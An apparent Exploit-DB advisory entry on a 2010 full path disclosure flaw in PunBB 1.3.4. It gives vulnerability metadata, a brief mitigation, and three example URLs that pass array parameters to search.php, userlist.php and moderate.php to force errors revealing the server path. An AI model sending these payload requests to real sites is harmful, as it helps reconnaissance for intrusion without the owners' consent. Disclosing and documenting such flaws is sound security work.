Punbb 1.3.4 Full Path Disclosure

vendor:

Punbb

by:

SYSTEM_OVERIDE, OverSecurityCrew

4,3

CVSS

MEDIUM

Full Path Disclosure

200

CWE

Product Name: Punbb

Affected Version From: 1.3.4

Affected Version To: 1.3.4

Patch Exists: NO

Related CWE: N/A

CPE: a:punbb:punbb:1.3.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Punbb 1.3.4 Full Path Disclosure

The vulnerabilities are in the file and the file /search.php, /userlist.php and moderate.php not properly control the content of variables keywords, author and get_host. An attacker can exploit this to find out the rootpath a website.

Mitigation:

Ensure that the content of variables keywords, author and get_host are properly controlled.

Source

Exploit-DB raw data:

# Exploit Title: Punbb 1.3.4 Full Path Disclosure
# Date: 07/11/2010
# Author: SYSTEM_OVERIDE, OverSecurityCrew
# Software Link: http://punbb.informer.com/
# Vulnerability Type: Full Path Disclosure
# Version: 1.3.4


Vulnerability Details:

The
vulnerabilities are in the file and the file /search.php, /userlist.php
and moderate.php not properly control the content of variables 
keywords, author and get_host.
An attacker can exploit this to find out the rootpath a website.

Example:

http://www.site.com/[path]/search.php?action=search&keywords[]=&author[]=&search_in=all&sort_by=0&SORT_DAshow_as=DESC&topics=&search=Submit+search
http://www.site.com/[path]/userlist.php?username[]=&show_group=-1&sort_by=username&sort_dir=ASC&search=Avvia+ricerca
http://www.site.com/[path]/moderate.php?get_host[]=


#SYSTEM_OVERIDE [07-11-2010]